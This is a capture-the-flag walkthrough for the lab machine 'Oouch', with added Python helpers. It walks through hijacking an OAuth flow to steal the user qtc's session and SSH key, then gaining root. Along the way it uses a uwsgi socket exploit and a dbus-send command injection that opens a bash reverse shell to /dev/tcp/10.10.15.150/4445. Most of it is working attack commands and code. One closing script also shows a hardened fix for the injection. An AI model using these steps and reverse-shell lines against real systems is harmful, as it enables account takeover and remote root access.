· 6 years ago · Mar 26, 2020, 06:38 AM
step 1: first create an account on both ports 5000 and 8000
step 2: go to consumer.oouch.htb:5000/oauth; after logging in you will get two links, one is connect and the other one is login
step 3: open burpsuite, go to consumer.oouch.htb:5000/oauth/connect, click authorize and intercept the request
step 4: forward the request until you see consumer.oouch.htb/oauth/connect/token?code=d4UfghXC5GTTWN6hombgggT7UU97, now copy this link and drop the request in burpsuite. don't forward this request, just copy the url and drop the request
step 5: go to the contact section, paste the link and send, then wait for 25-30 seconds
step 6: now after waiting 25-30 seconds go to consumer.oouch.htb:5000/oauth/login and click authorize
step 7: you will be logged in as QTC
step 8: now go to authorization.oouch.htb:8000/oauth/applications and make an application of any kind, but in the redirect url use your ip and port (4444), like http://tun0:4444/, and save the application. make sure to copy all the parameters: just intercept the request while saving and copy all the necessary parameters.
step 9: now make a custom url in authorization.oouch.htb with the parameters you just copied, like this
http://authorization.oouch.htb:8000/oauth/authorize/?grant_type=authorization_code&redirect_uri=http://10.10.14.120:4444&client_id=FlsQK7zQw2PjMm7dowYByLoBM3Y67g3rHtussjH5&client_secret=5ORNzjAKBRrvJ6m2a8waTEFhhUDtWcrNz4wq8xfL5EGgnu3UBl5U2Tlsu1YNDxpN3S5ejCeCffoqkT9fEsdWtFqM6anf2url1oDol4qL031iujzwsy89VZdbEWiyPNZb
now copy this url and paste it again in the contact form and send. make sure this time to turn the netcat listener on so you will get the session token of qtc
step 10: now log in on port 8000 with the session token you got and generate an access token like this: curl -X POST 'http://authorization.oouch.htb:8000/oauth/token/' -H "Content-Type: application/x-www-form-urlencoded" --data "grant_type=client_credentials&client_id=CTiDn876oeqCJX8lA9NRb6naRky9pQQFaTCHd5RA&client_secret=fEK4aAnSF6oXdARDrV6C1w3LZznRzfhCmzgZNtla7pVUMRNBtllH7Jy4GhpgjZekLVwnSujUpOyqx2fyKjuxVZpmG5j7RjB0qDi6y6bFTtWeh19QtMvh5omFBwBtKhQZ" -L -s
step 11: the above parameters are your own parameters which you copied while making the application
step 12: now make an api call like this: http://authorization.oouch.htb:8000/api/get_ssh/?access_token=blabla (note: this is the access token you got, and make sure to use the session id of qtc as well). you will get the ssh key; now format the key like your ssh key, with 38 lines and all
step 13: log in as qtc@10.10.10.177 and you will get user
16
FOR root:
step 1: now do ps -aux to view the running processes; you will see docker running on ip 172.18.0.2. this might change, so search for the ip using port 5000. now do ssh qtc@172.18.0.2
step 2: now use the exploit i have sent you. there is no wget or netcat in the machine, so copy the exploit as base64 and inside docker paste the script as exploit.py like this
cat exploit.py | base64 (on your local system; also install xclip on your system)
copy it
now do this inside docker
echo 'ctrl+shift+v' | base64 -d > exploit.py

use it like this: python exploit.py -m unix -u uwsgi.socket -c "bash -c 'use bash reverse shell here'" and turn on the netcat listener
you will get a reverse shell as www-data; now abuse the dbus using the command below
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block "string:;bash -c 'bash -i >& /dev/tcp/10.10.15.150/4445 0>&1'"

here again you have to turn the netcat listener on to get a shell as root
and rooted!
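The OAuth part of the chain above (steps 4 to 12), as an added example that is not part of the original comment. The host names and endpoint paths are the ones the comment uses; the authorize URL is built with the standard RFC 6749 response_type=code parameter; the shape of the request the victim delivers to the listener (a GET carrying the code in the query string plus the sessionid cookie) and all sample values are assumptions, constructed so the helpers run offline.

```python
"""Helpers for the OAuth code-theft chain in steps 4 to 12 above.

Added example, not code from the original post. Host names and endpoint
paths come from the post; the shape of the request the victim's browser
sends to the listener (a GET with the code in the query string and the
sessionid cookie) is an assumption, and every sample value is constructed.
"""
import json
import re
import textwrap
from urllib.parse import parse_qsl, urlencode, urlparse
from urllib.request import Request, urlopen

AUTH_SERVER = "http://authorization.oouch.htb:8000"


def build_authorize_url(client_id, redirect_uri, state=None):
    """Authorization request whose redirect_uri points at the attacker.

    response_type=code is the RFC 6749 parameter for the code grant. The
    optional state value is what a legitimate client adds and checks so a
    code forced on another user cannot be bound to their session; a consumer
    that checked it would reject the link pasted into the contact form.
    """
    params = {"response_type": "code", "client_id": client_id,
              "redirect_uri": redirect_uri}
    if state:
        params["state"] = state
    return f"{AUTH_SERVER}/oauth/authorize/?{urlencode(params)}"


def parse_captured_request(raw):
    """Extract the authorization code and cookies from the raw HTTP request
    the victim delivers to the netcat listener (step 9)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, *header_lines = head.splitlines()
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    query = dict(parse_qsl(urlparse(target).query))
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return {"method": method, "code": query.get("code"),
            "state": query.get("state"), "cookies": cookies}


def build_token_request(client_id, client_secret):
    """The client_credentials exchange the post performs with curl (step 10)."""
    body = urlencode({"grant_type": "client_credentials",
                      "client_id": client_id, "client_secret": client_secret})
    return (f"{AUTH_SERVER}/oauth/token/", body.encode(),
            {"Content-Type": "application/x-www-form-urlencoded"})


def normalize_private_key(text):
    """Rewrite a key that arrived as one line (literal backslash-n escapes,
    as in a JSON string) into a PEM file with 64-character body lines."""
    text = text.replace("\\n", "\n")
    m = re.search(r"-----BEGIN ([A-Z ]+)-----(.*?)-----END \1-----", text, re.S)
    if not m:
        raise ValueError("no PEM block found")
    label, body = m.group(1), re.sub(r"\s+", "", m.group(2))
    lines = [f"-----BEGIN {label}-----", *textwrap.wrap(body, 64),
             f"-----END {label}-----"]
    return "\n".join(lines) + "\n"


def fetch_ssh_key(session_id, client_id, client_secret):
    """Live version of steps 10 to 12; needs network access to the box."""
    url, body, headers = build_token_request(client_id, client_secret)
    with urlopen(Request(url, data=body, headers=headers)) as resp:
        token = json.load(resp)["access_token"]
    req = Request(f"{AUTH_SERVER}/api/get_ssh/?access_token={token}",
                  headers={"Cookie": f"sessionid={session_id}"})
    with urlopen(req) as resp:
        return normalize_private_key(resp.read().decode())


# Constructed sample of what the listener on port 4444 would receive.
SAMPLE_CAPTURE = (
    "GET /?code=examplecode123 HTTP/1.1\r\n"
    "Host: 10.10.14.120:4444\r\n"
    "Cookie: csrftoken=notreal; sessionid=victimsession\r\n"
    "\r\n"
)
# Constructed stand-in for the key string the API returns (not a real key).
SAMPLE_KEY = ("-----BEGIN RSA PRIVATE KEY-----\\nMIIE" + "A" * 196
              + "\\n-----END RSA PRIVATE KEY-----")

if __name__ == "__main__":
    captured = parse_captured_request(SAMPLE_CAPTURE)
    print(build_authorize_url("your_client_id", "http://10.10.14.120:4444/"))
    print(captured["code"], captured["cookies"].get("sessionid"))
    print(normalize_private_key(SAMPLE_KEY))
```

Paste the raw text that `nc -lvnp 4444` prints into parse_captured_request to pull out the code and sessionid; write the output of normalize_private_key to a file, chmod 600 it, and use it with ssh -i.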
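Why the leading ';' in the dbus-send string above works, as an added example that is not the machine's service code. It assumes the Block method interpolates its string argument into a shell command line, which is what the payload relies on; a harmless echo stands in for whatever the real service runs, and the injected command is a constructed marker instead of a reverse shell.

```python
"""Why the leading ';' in the dbus-send payload above gives code execution.

Added example, not the machine's service code. Assumption: the Block method
interpolates its string argument into a shell command line, which is what
the post's payload relies on. A harmless echo stands in for whatever the
real service runs, so this executes anywhere with /bin/sh.
"""
import ipaddress
import subprocess


def block_vulnerable(ip):
    """Builds one shell string from untrusted input: ';' terminates the
    intended command and the rest of the argument runs as well."""
    cmd = f"echo blocking {ip}"   # stand-in for the service's real command
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def block_hardened(ip):
    """Validates the argument as an IP address and passes it as a single
    argv element, so no shell ever parses it; junk raises ValueError."""
    addr = ipaddress.ip_address(ip.strip())
    result = subprocess.run(["echo", "blocking", str(addr)],
                            capture_output=True, text=True, check=True)
    return result.stdout


def is_rejected(ip):
    """True when block_hardened refuses the argument."""
    try:
        block_hardened(ip)
    except ValueError:
        return True
    return False


# Same shape as the post's "string:;bash -c '...'" argument, with a
# constructed marker instead of a reverse shell.
PAYLOAD = "; echo INJECTED"

if __name__ == "__main__":
    print(block_vulnerable(PAYLOAD))        # second line reads INJECTED
    print("rejected by hardened handler:", is_rejected(PAYLOAD))
```

The service on the box runs as root, so the hardened form matters twice: the argv list stops the shell from ever seeing the string, and the ipaddress check keeps the method from being a root-level "run this string" primitive even for callers who can reach the bus.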